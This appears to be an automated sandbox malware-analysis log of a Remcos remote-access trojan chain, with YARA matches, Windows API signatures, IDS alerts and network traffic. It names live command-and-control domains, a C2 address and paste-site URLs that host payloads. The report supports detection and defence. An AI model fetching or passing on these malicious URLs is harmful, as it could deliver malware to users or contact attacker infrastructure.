                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kanspt.dat, type: DROPPED
                    Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,23_2_004338C8
                    Source: powershell.exe, 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_7af7000a-4

                    Exploits

                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR

                    Privilege Escalation

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00407538 _wcslen,CoGetObject,23_2_00407538
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49744 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49746 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49749 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49750 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49751 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,21_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,23_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,23_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,23_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00407877 FindFirstFileW,FindNextFileW,23_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,23_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,23_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,23_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040AE51 FindFirstFileW,FindNextFileW,29_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,30_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,23_2_00407CD2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

                    Software Vulnerabilities

                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49745 -> 43.226.229.232:57484
                    Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 43.226.229.232:57484 -> 192.168.2.4:49745
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.96.3:443 -> 192.168.2.4:49735
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 188.114.96.3:443 -> 192.168.2.4:49735
                    Source: Malware configuration extractorURLs: iwarsut775laudrye001.duckdns.org
                    Source: Malware configuration extractorURLs: iwarsut775laudrye001.duckdns.org
                    Source: Malware configuration extractorURLs: iwarsut775laudrye3.duckdns.org
                    Source: Malware configuration extractorURLs: hjnourt38haoust1.duckdns.org
                    Source: unknownDNS query: name: paste.ee
                    Source: unknownDNS query: name: pastebin.com
                    Source: global trafficTCP traffic: 191.252.83.213 ports 1,2,60710,60113,60162,21
                    Source: unknownDNS query: name: iwarsut775laudrye001.duckdns.org
                    Source: Yara matchFile source: 3.2.powershell.exe.2203c568c58.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.2203d996da0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 191.252.83.213:60113
                    Source: global trafficTCP traffic: 192.168.2.4:49745 -> 43.226.229.232:57484
                    Source: global trafficHTTP traffic detected: GET /d/jm8qu/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/d80GV/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /class.txt HTTP/1.1Host: b2case.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/r322U/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 104.20.4.235
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: SOFTLAYERUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49748 -> 178.237.33.50:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49734 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49732 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49741 -> 188.114.96.3:443
                    Source: unknownFTP traffic detected: 191.252.83.213:21 -> 192.168.2.4:49730 220 "Servico de FTP da Locaweb"
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,23_2_0041B411
                    Source: AddInProcess32.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: AddInProcess32.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: global trafficDNS traffic detected: DNS query: ftp.desckvbrat.com.br
                    Source: global trafficDNS traffic detected: DNS query: paste.ee
                    Source: global trafficDNS traffic detected: DNS query: b2case.com
                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                    Source: global trafficDNS traffic detected: DNS query: iwarsut775laudrye001.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C6BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://b2case.com
                    Source: powershell.exe, 00000005.00000002.2605240365.0000028054873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D80B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://desckvbrat.com.br
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D80B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.desckvbrat.com.br
                    Source: AddInProcess32.exe, 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                    Source: AddInProcess32.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203DC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2943623698.000002204C172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2409816379.0000015C9A3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311218245.000002804C253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACDCA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC566000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                    Source: powershell.exe, 0000000D.00000002.1948758053.000001AB895D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000004.00000002.1789063987.0000015C8A5A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000001.00000002.3078580117.0000015B800B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789063987.0000015C8A381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACC3B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D34D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000004.00000002.1789063987.0000015C8A5A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: AddInProcess32.exeString found in binary or memory: http://www.ebuddy.com
                    Source: AddInProcess32.exeString found in binary or memory: http://www.imvu.com
                    Source: powershell.exe, 00000008.00000002.2115107372.000002D4EB8D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: AddInProcess32.exeString found in binary or memory: http://www.nirsoft.net/
                    Source: powershell.exe, 00000001.00000002.3078580117.0000015B8005F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                    Source: powershell.exe, 00000001.00000002.3078580117.0000015B8007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789063987.0000015C8A381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1787528120.000002803C1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACC3B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D34D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C6B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://b2case.com
                    Source: powershell.exe, 00000001.00000002.3078580117.0000015B80D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C6B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://b2case.com/class.txt
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1891382694.000002203A54B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000008.00000002.1779641476.000002D4D4D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D14E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: AddInProcess32.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203DC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2943623698.000002204C172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2409816379.0000015C9A3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311218245.000002804C253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1778802424.0000018ACDCA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1930444646.0000018ADC566000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2013682859.000002D4E3550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D4DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                    Source: powershell.exe, 00000007.00000002.1778802424.0000018ACD883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1779641476.000002D4D49A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D8B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DB93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DB96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/d80GV/0
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203DB93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/d80GV/0P
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D80B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/jm8qu/0
